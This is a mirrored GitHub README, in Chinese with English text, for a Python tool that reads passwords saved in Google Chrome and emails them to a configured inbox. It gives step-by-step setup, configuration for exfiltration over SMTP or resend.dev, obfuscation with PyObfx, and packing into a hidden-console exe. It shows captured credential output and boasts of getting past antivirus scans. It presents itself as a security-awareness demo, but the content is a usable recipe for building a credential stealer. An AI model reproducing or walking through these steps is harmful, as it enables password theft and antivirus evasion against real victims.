Git Product home page Git Product logo

lissettecarlr / infosec-googlechrome Goto Github PK

View Code? Open in Web Editor NEW
7.0 3.0 3.0 1.45 MB

一个窃取谷歌浏览器保存的密码的示例程序,不会被杀毒软件识别,提示大家对数据安全的注意!(A sample program that steals passwords saved in Google Chrome without being detected by antivirus software, reminding everyone to pay attention to data security!)

Python 100.00%

infosec-googlechrome's Introduction

中文 | English

InfoSec GoogleChrome

1 说明

本仓库的源码是基于ohyicong进行的修改,主要用于演示打包一个杀毒软件无法察觉的程序,窃取用户在google上保存的密码。提示大家对信息安全的注意,和用google浏览器保存密码非常不安全的认识。

  • 更新7/20 增加了resend邮件方式

2 使用

2.1 环境

  • windows
  • python3
  • 克隆项目到本地 
    git clone https://github.com/lissettecarlr/InfoSec-GoogleChrome.git
cd InfoSec-GoogleChrome
  • 安装依赖 
    pip install -r requirements.txt
  • 混淆器 
    git clone https://github.com/PyObfx/PyObfx.git
cd PyObfx
pip install -r requirements.txt
cd ..

2.2 配置

  • 新建secret.yaml文件,填写邮箱信息(为了将获得的数据通过邮件发送): 
        email:
        host : '邮箱服务器地址,例如:smtp.163.com'
        user : 'xxx'
        pass : '如果是163邮箱,则在网页版的设置中开启IMAP/SMTP服务后获得' 
        sender : '发送的邮箱'  
        receivers : '接收的邮箱(可以和发送邮箱相同)' 
    resend:
        key : 'resend.dev的key'
        from: 'resend的from'
        to: "注册resend的邮箱"
    这里增加了resend邮件方式方式,需要你先去注册个账号,然后生成key。注意的是默认情况下,它的from和to是固定的,注册后在示例那里能看到。如果key不填写,则不使用该方式发生邮件
  • 修改config文件,配置是否发送邮件,是否保存到本地的json文件 
        include : secret.yaml

    output:
        json: 'ON'
        email: 'ON'
        sender_email : 'ON'
``

2.3 打包

  • 对代码进行混淆

    python ./PyObfx/PyObfx.py decrypt_chrome_passwords.py

  • 修改(混淆器漏掉的)

    # 混淆后漏掉的示例,由于混淆不同所有下列知识对比参考。yaml没有混淆
oYRvAuKk = mQaPXiYD.load(DA, Loader=yaml.Loader)
# 根据你yaml的别名修改,如下
import yaml as mQaPXiYD
oYRvAuKk = mQaPXiYD.load(DA, Loader=mQaPXiYD.Loader)

  • 打包成exe,在dist目录下生成exe文件

    pyinstaller -F --add-data "config.yaml;." --add-data "secret.yaml;." .\decrypt_chrome_passwords_obfx.py --noconsole

2.4 结果

如果打开了config中的json和email,那么在执行exe时会在当前目录生成output.json。

[
    {
        "url": "http://192.168.2.1/cgi-bin/luci/",
        "username": "root",
        "p": "testtest"
    }
]

然后邮箱收到邮件:

邮件

上列条目数是根据你自己在google浏览器中保存的密码条目决定的,我这里是临时添加了一条,所有只有一条。

3 杀毒

  • 火绒安全 火绒

  • 顺便找的个在线查毒 查毒

infosec-googlechrome's People

Contributors

lissettecarlr avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar

Forkers

khankisali xueliangzhang 666git

infosec-googlechrome's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.